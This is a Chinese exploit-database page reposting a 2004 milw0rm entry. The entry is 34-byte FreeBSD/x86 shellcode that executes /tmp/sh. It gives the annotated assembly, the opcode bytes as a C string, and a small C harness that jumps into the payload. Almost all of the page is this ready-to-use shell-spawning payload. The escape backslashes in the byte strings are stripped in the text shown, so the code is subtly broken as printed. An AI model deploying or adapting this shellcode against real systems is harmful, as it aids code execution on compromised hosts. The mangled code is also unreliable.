FreeBSD/x86 – execve(/tmp/sh) Shellcode (34 bytes)
漏洞ID | 1054672 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | FreeBSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* FreeBSD shellcode - execve /tmp/sh
*
* Claes M. Nyberg 20020120
*
* <[email protected]>, <[email protected]>
*/
/**********************************************************
void
main()
{
__asm__("
xorl %eax, %eax # eax = 0
pushl %eax # string ends with NULL
pushl $0x68732f2f # push 'hs//' (//sh)
pushl $0x706d742f # push 'pmt/' (/tmp)
movl %esp, %ebx # ebx = argv[0] = string addr
pushl %eax # argv[1] = NULL
pushl %ebx # argv[0] = /bin//sh
movl %esp, %edx # edx = &argv[0]
pushl %eax # envp = NULL
pushl %edx # &argv[0]
pushl %ebx # *path = argv[0]
pushl %eax # Dummy
movb $0x3b, %al # al = 59 = execve
int $0x80 # execve(argv[0], argv, NULL)
xorl %eax, %eax # eax = 0
inc %eax # eax++
pushl %eax # Exit value = 1
pushl %eax # Dummy
int $0x80 # exit(1); (eax is 1 = execve)
");
}
************************************************************/
#include <stdio.h>
#include <string.h>
static char freebsd_code[] =
"x31xc0" /* xorl %eax, %eax */
"x50" /* pushl %eax */
"x68x2fx2fx73x68" /* pushl $0x68732f2f */
"x68x2fx74x6dx70" /* pushl $0x706d742f */
"x89xe3" /* movl %esp, %ebx */
"x50" /* pushl %eax */
"x53" /* pushl %ebx */
"x89xe2" /* movl %esp, %edx */
"x50" /* pushl %eax */
"x52" /* pushl %edx */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x3b" /* movb $0x3b, %al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xorl %eax, %eax */
"x40" /* inc %eax */
"x50" /* pushl %eax */
"x50" /* pushl %eax */
"xcdx80"; /* int $0x80 */
static char _freebsd_code[] =
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx74x6dx70x89xe3x50"
"x53x89xe2x50x52x53x50xb0"
"x3bxcdx80x31xc0x40x50x50"
"xcdx80";
void
main(void)
{
void (*code)() = (void *)freebsd_code;
printf("strlen code: %dn", strlen(freebsd_code));
code();
}
// milw0rm.com [2004-09-26]
相关推荐: Symantec Norton Personal Firewall 2002 Portscan Protection Bypass Vulnerability
Symantec Norton Personal Firewall 2002 Portscan Protection Bypass Vulnerability 漏洞ID 1102222 漏洞类型 Design Error 发布时间 2002-04-16 更新时…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666